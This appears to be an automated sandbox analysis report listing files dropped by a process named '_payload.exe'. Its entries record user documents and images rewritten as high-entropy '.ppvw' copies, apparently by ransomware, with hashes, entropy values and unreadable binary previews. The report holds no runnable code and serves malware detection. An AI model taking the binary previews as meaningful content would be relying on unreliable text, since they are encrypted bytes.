                                                                                                                          Preview:LTKMY)...7M..7.P|.6IXs..kx.p.....*`.o....>..4..sK..`KJd.Mi..Hx.br.V.g..x......^q+b.bC}.=.t.....<7.I.....T ..r......!...9D.r...P.=(....B..#EN.w.nP?r%C..B...c.|.....n"..2..wJ.`.-KSAx.....U.E].._..j,%.th.3),,.p.3..~...\..C{...wS.F,}..Z.;.2`S......c.KO...<2..z.e..W.[..r...t@....Y..P.T.`B...........*^@.!..%N.^0/.rg'Q'.@~.....r&.....|..p.........N.3.?.+i..40.....#...T....`..@.e..7...).h.n..4..+...b-"'%....#D........"...W....o...O.q..1l...e.+.....X._...d 8\.^..7@.g$fOX......w.ig.&..<..@.../....WP.....&.L.%..5...`.j.l..r......./.>X.........W._-e..C5..."..7$.f..b..|....s...b:.T.c....G.5XT.~...4....p.....*......!............"bL.Z..s...=.;...PE;.@.........).):.K...7..(!.e..OL.l@9.{..2.V..sIBj...bK...._..b......\..u2|.1.k+tI.8o................(tSPV..].6....m.Ky..?N...*..}h..kk[....T.d.{b.h.......:.).Dlj.hUO..(.=.....^.../..L....d..@<.]0`~.v=h..h..<..~...Y..g}..V.1i..S...k.o.....#.P..[...]..A........~.m.NM.k.....f.e.v4..../...g.&".e.b........./.

                                                                                                                          C:\Users\user\Documents\LTKMYBSEYZ.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856799558420025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:IoN4quK1EQ5cYkYHx/McE4UmnbNRQY7J/MBK1wnYborE97K3bnVfbD:1N4M1lB2cE4/F7Jb1wnYmiWbnVDD
                                                                                                                          MD5:685243030B73EBF6267EF5AE637BF108
                                                                                                                          SHA1:853B6E06B7F749D5426CD358233E0BF5918B5655
                                                                                                                          SHA-256:2D8FAA62241A9DA34BBADA6DB5D89EFB18FB9334EBE806166E171A4C56A3BE2E
                                                                                                                          SHA-512:53F7D96F844FC154E03F5066A03B8E75B7E99742C7A3500E436EA90534ED40E357AAA6A19E76288964501FC81FAABE8871E4C5DE64D002465E402A575030599F
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY)...7M..7.P|.6IXs..kx.p.....*`.o....>..4..sK..`KJd.Mi..Hx.br.V.g..x......^q+b.bC}.=.t.....<7.I.....T ..r......!...9D.r...P.=(....B..#EN.w.nP?r%C..B...c.|.....n"..2..wJ.`.-KSAx.....U.E].._..j,%.th.3),,.p.3..~...\..C{...wS.F,}..Z.;.2`S......c.KO...<2..z.e..W.[..r...t@....Y..P.T.`B...........*^@.!..%N.^0/.rg'Q'.@~.....r&.....|..p.........N.3.?.+i..40.....#...T....`..@.e..7...).h.n..4..+...b-"'%....#D........"...W....o...O.q..1l...e.+.....X._...d 8\.^..7@.g$fOX......w.ig.&..<..@.../....WP.....&.L.%..5...`.j.l..r......./.>X.........W._-e..C5..."..7$.f..b..|....s...b:.T.c....G.5XT.~...4....p.....*......!............"bL.Z..s...=.;...PE;.@.........).):.K...7..(!.e..OL.l@9.{..2.V..sIBj...bK...._..b......\..u2|.1.k+tI.8o................(tSPV..].6....m.Ky..?N...*..}h..kk[....T.d.{b.h.......:.).Dlj.hUO..(.=.....^.../..L....d..@<.]0`~.v=h..h..<..~...Y..g}..V.1i..S...k.o.....#.P..[...]..A........~.m.NM.k.....f.e.v4..../...g.&".e.b........./.

                                                                                                                          C:\Users\user\Documents\NIKHQAIQAU.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.854018002014928
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:zLLxSb02hjiPrhvb/kNTqU5yelT2EurVm7il2K2DVXlwqxqHcSRNvlbD:3LUY2yrhjsNJNlKNI7wmXlwq4Vl1D
                                                                                                                          MD5:386185BDD661575335B381E6808AEA9C
                                                                                                                          SHA1:4E6E150D54977F26270FD6A6747447F089511BA8
                                                                                                                          SHA-256:D78E343D032F492D247B5177182AC23EA7073E46AD05EB58625EDF999F090A94
                                                                                                                          SHA-512:B478834C20517F306686F9042E9A556C352E005381B59485D1907558222DC0A188D266FAA5AD1AB9A286E4D8147212C436012F82D9FA8C8953DAC9E2AC89F94B
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQo,`.rc@...1{{L!rn5.1~.wl..7T..c..T...........c.,........e...q..0M...Y+.q<,..h.k.+:.. 0._].d..df..D...>....Xw.n\..V.Jp.....m.k...Z.Vw.[.N../z....`...u....#......5......E......v..^..8.9...u....l5(.[...5._...6.bp.}..[!7.....ph`....>Y~Q.@......).........Z/....x...^..Y.P.Ks..~Y......4...2+....,/c4........C9.<..e4..2..3s...0..z...Z.B.HA.D...B{^....=.@=rPS&.K....>~..>..}...5..rUdp.^.>...c.!...?.RG...@5......z......_...J.r..p....?...>..#.S^.5..).9.h.|].3.k]m.m..i;y..;Z.......-[P$j_P.|8....n..O'..5.!D]..f....iC.....R`.`.;. .e].;.;....-...k..+.../...F..-..GW;...1.fq...1....O<.Ul.......c8.k{......KqA..B..W....n......?...j..?@.)d....[.=).......Z..g....{\%t1.............%.._.7.U.#UZ.w.}...X=8..m.K..K."h..sD.;B.W-.s.....,...rXW..d..\.c.V.k....;_.....j..>..}..&(.....}8...g.F#^....a.....j..2..(..Z.....vU{.l.@..K........U..........l..MJ..=K.........&z......}.L......&.8..../d..u....|......qw..N.0.1...o.....<..[.X]I8..Q[.\.]..^...B.n.x<a.*$...ihr...".3H.9..

                                                                                                                          C:\Users\user\Documents\NIKHQAIQAU.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.854018002014928
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:zLLxSb02hjiPrhvb/kNTqU5yelT2EurVm7il2K2DVXlwqxqHcSRNvlbD:3LUY2yrhjsNJNlKNI7wmXlwq4Vl1D
                                                                                                                          MD5:386185BDD661575335B381E6808AEA9C
                                                                                                                          SHA1:4E6E150D54977F26270FD6A6747447F089511BA8
                                                                                                                          SHA-256:D78E343D032F492D247B5177182AC23EA7073E46AD05EB58625EDF999F090A94
                                                                                                                          SHA-512:B478834C20517F306686F9042E9A556C352E005381B59485D1907558222DC0A188D266FAA5AD1AB9A286E4D8147212C436012F82D9FA8C8953DAC9E2AC89F94B
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQo,`.rc@...1{{L!rn5.1~.wl..7T..c..T...........c.,........e...q..0M...Y+.q<,..h.k.+:.. 0._].d..df..D...>....Xw.n\..V.Jp.....m.k...Z.Vw.[.N../z....`...u....#......5......E......v..^..8.9...u....l5(.[...5._...6.bp.}..[!7.....ph`....>Y~Q.@......).........Z/....x...^..Y.P.Ks..~Y......4...2+....,/c4........C9.<..e4..2..3s...0..z...Z.B.HA.D...B{^....=.@=rPS&.K....>~..>..}...5..rUdp.^.>...c.!...?.RG...@5......z......_...J.r..p....?...>..#.S^.5..).9.h.|].3.k]m.m..i;y..;Z.......-[P$j_P.|8....n..O'..5.!D]..f....iC.....R`.`.;. .e].;.;....-...k..+.../...F..-..GW;...1.fq...1....O<.Ul.......c8.k{......KqA..B..W....n......?...j..?@.)d....[.=).......Z..g....{\%t1.............%.._.7.U.#UZ.w.}...X=8..m.K..K."h..sD.;B.W-.s.....,...rXW..d..\.c.V.k....;_.....j..>..}..&(.....}8...g.F#^....a.....j..2..(..Z.....vU{.l.@..K........U..........l..MJ..=K.........&z......}.L......&.8..../d..u....|......qw..N.0.1...o.....<..[.X]I8..Q[.\.]..^...B.n.x<a.*$...ihr...".3H.9..

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.825473741501839
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:M4O0W0Vu39kGDVk9ohZrumlm5NRmRG5jvM0zLV7mVsGBGFPVGbD:M4hwkYVyoh5B4NRmRGdMkhgsGktSD
                                                                                                                          MD5:83BDD53B407D7298265B8671C9DF89F8
                                                                                                                          SHA1:88C7F82171584304592893DEC1BBA4CE9C75E2E5
                                                                                                                          SHA-256:5A374B79BA30DE8AE1C707C64D450C3093437E8D720758491F446F04CC55B4D8
                                                                                                                          SHA-512:524A6F817FD36FA38730ED83DB930AC13FA72D6427F29C66AABE1BBB5FB2B154CE70AC222515532E79BD5462AC3DC60452B94069F3213FBCD6253EE557C86DAD
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQCoO.k8.ry.....s!9.oO^..9.^^.....>...M:.....8...}.#...|..Zn..'.~...+F..@.k,..o@.v...m.K...r/i....h.tFsC...........u2y?.?r.`.......=..V:1..[.9@..{rZ.K....%...U.#.ezE%bd....H.$(zAi6[N.l...g.f......"e.g........I..!.x.l.I.&@.G.'........"..E..gk..[.E}.+.>"G..S.5.n"/.@....[.R.i.C.|)\....S..W.D...~..{dr.&Y%....N...Z....g.O..j..m$..Q.....W.5R0.....N3...|.....@.4..UY..$..2...z.N..8..1..qi.d}..(. C.Q.._.vV...5p....@b-..m..xA.lC`...qw.s.0..].P..{..y...(.6|M.I.dg\L.......r.B.M..b,..0..uCL.8.C.".........vy...%$..C...)....../....Vh..H.a....|....R...oP1O.U.l.V.:....HV_@...%..RQ8...U..ez..`.......7..?[..#S.....q..S{..+r.r`./..$.}.e.T|'-.K......|`.......(7.L{J....B.D....LO.F.K...5.......*...E....}.%..L..k.A..t.lE...<.9C.`E.*.}\......vAu....k....f....s.....I......\.?X..|..+.........3..E.....M.[B.$....B....!.w...){....?...$.Ny.X../..g.%..:...}.4RQ...b.....q...%.0....I&....no.....ud...A.O;s>..#!...{...8....1>...I.+...R.j...$.....'....(lz.!INJ

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.825473741501839
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:M4O0W0Vu39kGDVk9ohZrumlm5NRmRG5jvM0zLV7mVsGBGFPVGbD:M4hwkYVyoh5B4NRmRGdMkhgsGktSD
                                                                                                                          MD5:83BDD53B407D7298265B8671C9DF89F8
                                                                                                                          SHA1:88C7F82171584304592893DEC1BBA4CE9C75E2E5
                                                                                                                          SHA-256:5A374B79BA30DE8AE1C707C64D450C3093437E8D720758491F446F04CC55B4D8
                                                                                                                          SHA-512:524A6F817FD36FA38730ED83DB930AC13FA72D6427F29C66AABE1BBB5FB2B154CE70AC222515532E79BD5462AC3DC60452B94069F3213FBCD6253EE557C86DAD
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQCoO.k8.ry.....s!9.oO^..9.^^.....>...M:.....8...}.#...|..Zn..'.~...+F..@.k,..o@.v...m.K...r/i....h.tFsC...........u2y?.?r.`.......=..V:1..[.9@..{rZ.K....%...U.#.ezE%bd....H.$(zAi6[N.l...g.f......"e.g........I..!.x.l.I.&@.G.'........"..E..gk..[.E}.+.>"G..S.5.n"/.@....[.R.i.C.|)\....S..W.D...~..{dr.&Y%....N...Z....g.O..j..m$..Q.....W.5R0.....N3...|.....@.4..UY..$..2...z.N..8..1..qi.d}..(. C.Q.._.vV...5p....@b-..m..xA.lC`...qw.s.0..].P..{..y...(.6|M.I.dg\L.......r.B.M..b,..0..uCL.8.C.".........vy...%$..C...)....../....Vh..H.a....|....R...oP1O.U.l.V.:....HV_@...%..RQ8...U..ez..`.......7..?[..#S.....q..S{..+r.r`./..$.}.e.T|'-.K......|`.......(7.L{J....B.D....LO.F.K...5.......*...E....}.%..L..k.A..t.lE...<.9C.`E.*.}\......vAu....k....f....s.....I......\.?X..|..+.........3..E.....M.[B.$....B....!.w...){....?...$.Ny.X../..g.%..:...}.4RQ...b.....q...%.0....I&....no.....ud...A.O;s>..#!...{...8....1>...I.+...R.j...$.....'....(lz.!INJ

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.85459159114751
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLIXAbfwtSWuhPoSQyIA33k24E7+6vnO4nzwNdmSTVaglcMa2q3jXAN1zP+bD:T8XieSThPoSQyIA3vy6fOycNd7TVagly
                                                                                                                          MD5:BD6FBF2AF3D7FC2F534A05C571751B80
                                                                                                                          SHA1:780BC4427252AF5F628356EC3F83B2326B5B5A17
                                                                                                                          SHA-256:16E46AED0AF9D7831DAB378F58D3B6F0AE6C211022286112F9EF32F639097305
                                                                                                                          SHA-512:C4CCF1C4DB1BD0B35001D68F9F1A1DC4D9D767009B71B9B845D920C684297C9C7C580A4098A70F7A1162C022429A4E768B3685090C1B93DB1E42AD865B7F620E
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV....4.V...1...=[(.....i.n..)...Ki.E...>.$..5...A.z.h......n....+.F..|.oTz.K..M.@.7pY.....~d.;.,...Vb..W.E.].!K--.P......`.%.........g.9..M..=.a[.P..|....E<..U\.4.^..3o.~.8S..+P..c.y......Oy~/..`.....y....l....a.K.N.u.#..XY....]}.D....Dp...g|..N............9..V.qX_(..w..8cz..{y@.gW. -M....p.2...]LSw..@...c.a......;...Rn....AS...D+V.]f.xn..u.A.......<.2.....D .(........h.-j..rF..O.5.I..9....s..N...0a.o....&.m....*Y..TZFf,a.:E.....7..^~.{A.D..P\..Wg..z<.H...=..s...d.I.....=r8C.%.x.........i...I..<C.".D......8|V.EO>..t.#.\1.I`g;i..8..I...n.<.....,.....Ki....g....3$.rm....@=:.Pn...(........|..e..S62..%.,...t...a%zw:..T1.>.q."GL...m.....t..R.l_......`....V.+....BY.j.....0.e...../.3....\e....8M.4n/.K.e.!...cB.I.:.z....Y...7.B.{.... ..9...*....|8>!.-...............el..N......-_.......I.n.d..2..(u...z.h._S)s.4.L.G.JR.<.i.iP.\.%....:.V..fvCU..M1S{.)..6.o....G..7.7..s.....a.R.....}B.......o<e.8..l@v.:C........r,u...9j...12.a......Fq.:I..

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.85459159114751
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLIXAbfwtSWuhPoSQyIA33k24E7+6vnO4nzwNdmSTVaglcMa2q3jXAN1zP+bD:T8XieSThPoSQyIA3vy6fOycNd7TVagly
                                                                                                                          MD5:BD6FBF2AF3D7FC2F534A05C571751B80
                                                                                                                          SHA1:780BC4427252AF5F628356EC3F83B2326B5B5A17
                                                                                                                          SHA-256:16E46AED0AF9D7831DAB378F58D3B6F0AE6C211022286112F9EF32F639097305
                                                                                                                          SHA-512:C4CCF1C4DB1BD0B35001D68F9F1A1DC4D9D767009B71B9B845D920C684297C9C7C580A4098A70F7A1162C022429A4E768B3685090C1B93DB1E42AD865B7F620E
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV....4.V...1...=[(.....i.n..)...Ki.E...>.$..5...A.z.h......n....+.F..|.oTz.K..M.@.7pY.....~d.;.,...Vb..W.E.].!K--.P......`.%.........g.9..M..=.a[.P..|....E<..U\.4.^..3o.~.8S..+P..c.y......Oy~/..`.....y....l....a.K.N.u.#..XY....]}.D....Dp...g|..N............9..V.qX_(..w..8cz..{y@.gW. -M....p.2...]LSw..@...c.a......;...Rn....AS...D+V.]f.xn..u.A.......<.2.....D .(........h.-j..rF..O.5.I..9....s..N...0a.o....&.m....*Y..TZFf,a.:E.....7..^~.{A.D..P\..Wg..z<.H...=..s...d.I.....=r8C.%.x.........i...I..<C.".D......8|V.EO>..t.#.\1.I`g;i..8..I...n.<.....,.....Ki....g....3$.rm....@=:.Pn...(........|..e..S62..%.,...t...a%zw:..T1.>.q."GL...m.....t..R.l_......`....V.+....BY.j.....0.e...../.3....\e....8M.4n/.K.e.!...cB.I.:.z....Y...7.B.{.... ..9...*....|8>!.-...............el..N......-_.......I.n.d..2..(u...z.h._S)s.4.L.G.JR.<.i.iP.\.%....:.V..fvCU..M1S{.)..6.o....G..7.7..s.....a.R.....}B.......o<e.8..l@v.:C........r,u...9j...12.a......Fq.:I..

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU\LTKMYBSEYZ.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86646466499407
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DwptaV6i/DVSI8/yTv7s4F1qLdhDh4g5iwCiTwlACyx4bD:DUSTL8yd+h4eIisjGiD
                                                                                                                          MD5:4FC87B54F22C87106870C763776616A2
                                                                                                                          SHA1:C5179E2713A06562694430C276454D617D51A4F6
                                                                                                                          SHA-256:CDE7DF1FB89F7BDD4CC63024F2742CC3FBF9B95BF2AA2026C56D444466403657
                                                                                                                          SHA-512:26585ED659FD1A0718CF9EB87C90ABD1638B21934D73E76FC03C42D35559917A98F5EC08C544CCE2ABEE49B4EB242A2CBEC85412CE14433C9CA58EB0F37DDC15
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY....;u)...)G.....$*.....Ulm.......Hvv..........uj3..G....O..-.....}L.... ..,......yt .v..OP;{w..........J......g.q.x."/..x....$X.C.............v.[.H0...J..<_..._e./..U....).m.Oh.....q...9..J.b...x...o........?q<I.f.."..)@6..@...:..E...n.gc.A..8?......|...............j7.Si..P..%.~b%wQa.3....*.HT.>.a...Ik.D.6.S.~QW...6...........3!.....Q........S+..c5@...W..t>f..1.,."......_S.......j....e..(.$..;..d...A.d...q..2.P..Wg.T...8t.....=..{.<..:....(.........^.T; ...u.f+..m.......cNm....nhS..z(~..=...k..+?#...C.'g..mqRk.3..Cz.P..!..#..I.c.....F.F.K..L.....]ga.M.......'.Q.^....,u.YFC.[A"q..+.....(D.'..c..`..Y=.q....Q..Z4.4...i....2.N_.{..b...........g.T.V..u$..nF....Q3yE..R..5....C|.\....`....S...o.A.m......{...k%...WU2....{.$......dI;k.\.28.3M...>R5.....K..*O..3Y.%87J...s2....Z.T.4^U..[Z...5.`........tlW....v.......\9.#..8....+[tY/.V......n.zH.../.Z..Z.U...B.4...)..^...."@..).D1..g.:...2k0..Z.X.I}.Zr.-.2+.xmO..t.B......L.Z...m..M.q..CK|..d.

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU\LTKMYBSEYZ.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86646466499407
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DwptaV6i/DVSI8/yTv7s4F1qLdhDh4g5iwCiTwlACyx4bD:DUSTL8yd+h4eIisjGiD
                                                                                                                          MD5:4FC87B54F22C87106870C763776616A2
                                                                                                                          SHA1:C5179E2713A06562694430C276454D617D51A4F6
                                                                                                                          SHA-256:CDE7DF1FB89F7BDD4CC63024F2742CC3FBF9B95BF2AA2026C56D444466403657
                                                                                                                          SHA-512:26585ED659FD1A0718CF9EB87C90ABD1638B21934D73E76FC03C42D35559917A98F5EC08C544CCE2ABEE49B4EB242A2CBEC85412CE14433C9CA58EB0F37DDC15
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY....;u)...)G.....$*.....Ulm.......Hvv..........uj3..G....O..-.....}L.... ..,......yt .v..OP;{w..........J......g.q.x."/..x....$X.C.............v.[.H0...J..<_..._e./..U....).m.Oh.....q...9..J.b...x...o........?q<I.f.."..)@6..@...:..E...n.gc.A..8?......|...............j7.Si..P..%.~b%wQa.3....*.HT.>.a...Ik.D.6.S.~QW...6...........3!.....Q........S+..c5@...W..t>f..1.,."......_S.......j....e..(.$..;..d...A.d...q..2.P..Wg.T...8t.....=..{.<..:....(.........^.T; ...u.f+..m.......cNm....nhS..z(~..=...k..+?#...C.'g..mqRk.3..Cz.P..!..#..I.c.....F.F.K..L.....]ga.M.......'.Q.^....,u.YFC.[A"q..+.....(D.'..c..`..Y=.q....Q..Z4.4...i....2.N_.{..b...........g.T.V..u$..nF....Q3yE..R..5....C|.\....`....S...o.A.m......{...k%...WU2....{.$......dI;k.\.28.3M...>R5.....K..*O..3Y.%87J...s2....Z.T.4^U..[Z...5.`........tlW....v.......\9.#..8....+[tY/.V......n.zH.../.Z..Z.U...B.4...)..^...."@..).D1..g.:...2k0..Z.X.I}.Zr.-.2+.xmO..t.B......L.Z...m..M.q..CK|..d.

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851586679494581
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:qfk/6MtdvDgvqp45RABefAovkUGBu2XvW9za5faURqfhbvNiCJqbD:WY6MPrgyMaB4AovZGBRvAazApbvNiCWD
                                                                                                                          MD5:8276680D5BCC76DDDEFD69CE51CA2172
                                                                                                                          SHA1:B138CFCC7FEC4F63561C2E1B925220E6DBCB5568
                                                                                                                          SHA-256:FB3E0F1D26FD39398BC8CB22A3D188CB11AB6AC9773AD51371A42996605DECAC
                                                                                                                          SHA-512:253637734DCE4AC9239CDCB48CD33528C83E995F664DBB5DABDC23465B20ECD4803017B76E820828990DD12095E65C8110F4B16C6636005799194F411453E461
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD.(Qh...j....D?y". .e.!F.D9.....Z.L.t..<....Oq.......J.,e&G.3.7...6.....iX..j.....y.-C.xv.......A.....@.}> ^r|+$*........*P..k.:...+.z.3.t.V/+t...2=...3b.1a...dHc..fx.O..n..8,....X.W....;0.L..*...-..F..c.w...-t.....X;.%7..U.H.k...I.,.....7L.P]......"...f...>...x.3K.l..M..q.U.o`.P...-.........uL. ....q{.!..v...........?$..9IN...|..w...*.";....A.n...+3C'.\..$..8..0......;;]1..[..~......{...h.+.Mb..OA.J..#*.j....V.,28.......Y#g...AK..z...1.uuY..~....+./...A..W\^.%..[.>x0o......y._;8^~...5;a[......D...K;.....+a...A1MP......E.4.[...D..'..2...g....@iU...?3.O..E.....Fz.. .#.p.r#<S.$.C.j..c.O...\.0..._K..i..n....\6a.......P^.g.[H...?.....y>.r......`.%.....5f.."n..O.es8e].D.Z./M ..|.F.R.%.G...L....F]L..%....v.+..&.z.0i..p..Je.....,....6..{....s=..W)7.+...G..m..c.*F.}]|.D....Nb4]Z..0}.0..J.*..Q..}.7.RaBX..}.K..w.-t....G....|.l!f..Alc`v.....NWX.&y,...Cq.a..).;...Y5.y......`..!..r3q..t.m];[..2...=..@...(5o....FR................n...q..=.E...

                                                                                                                          C:\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851586679494581
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:qfk/6MtdvDgvqp45RABefAovkUGBu2XvW9za5faURqfhbvNiCJqbD:WY6MPrgyMaB4AovZGBRvAazApbvNiCWD
                                                                                                                          MD5:8276680D5BCC76DDDEFD69CE51CA2172
                                                                                                                          SHA1:B138CFCC7FEC4F63561C2E1B925220E6DBCB5568
                                                                                                                          SHA-256:FB3E0F1D26FD39398BC8CB22A3D188CB11AB6AC9773AD51371A42996605DECAC
                                                                                                                          SHA-512:253637734DCE4AC9239CDCB48CD33528C83E995F664DBB5DABDC23465B20ECD4803017B76E820828990DD12095E65C8110F4B16C6636005799194F411453E461
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD.(Qh...j....D?y". .e.!F.D9.....Z.L.t..<....Oq.......J.,e&G.3.7...6.....iX..j.....y.-C.xv.......A.....@.}> ^r|+$*........*P..k.:...+.z.3.t.V/+t...2=...3b.1a...dHc..fx.O..n..8,....X.W....;0.L..*...-..F..c.w...-t.....X;.%7..U.H.k...I.,.....7L.P]......"...f...>...x.3K.l..M..q.U.o`.P...-.........uL. ....q{.!..v...........?$..9IN...|..w...*.";....A.n...+3C'.\..$..8..0......;;]1..[..~......{...h.+.Mb..OA.J..#*.j....V.,28.......Y#g...AK..z...1.uuY..~....+./...A..W\^.%..[.>x0o......y._;8^~...5;a[......D...K;.....+a...A1MP......E.4.[...D..'..2...g....@iU...?3.O..E.....Fz.. .#.p.r#<S.$.C.j..c.O...\.0..._K..i..n....\6a.......P^.g.[H...?.....y>.r......`.%.....5f.."n..O.es8e].D.Z./M ..|.F.R.%.G...L....F]L..%....v.+..&.z.0i..p..Je.....,....6..{....s=..W)7.+...G..m..c.*F.}]|.D....Nb4]Z..0}.0..J.*..Q..}.7.RaBX..}.K..w.-t....G....|.l!f..Alc`v.....NWX.&y,...Cq.a..).;...Y5.y......`..!..r3q..t.m];[..2...=..@...(5o....FR................n...q..=.E...

                                                                                                                          C:\Users\user\Documents\UMMBDNEQBN.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.859643385170734
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:srq4uXb0hX4KG2OewuYv1HSqZ6F6DTTrVg4BQePERqmHlV9oNMJX3+xOfASJ3B0y:srq4uX2XHG2Oe+NX6FiTZdBUFkFuAI5D
                                                                                                                          MD5:797B93C723FD26F4B666F100E43CA010
                                                                                                                          SHA1:FB1A68E05F1FD362982081F5103446E240D33826
                                                                                                                          SHA-256:16E26504A19A0089BFDB7D5FD4A950FDFAD7AF56CD2F485D548318835FD30F0A
                                                                                                                          SHA-512:73A6BA823B57934F0BFD266160EA0F5F4FCC1A448CF3B80CAF904C42D4478E439A9E2505960F28F218B6A30AB19793126D8C8403C9E9964A99BB86EEB6059A0C
                                                                                                                          Malicious:false
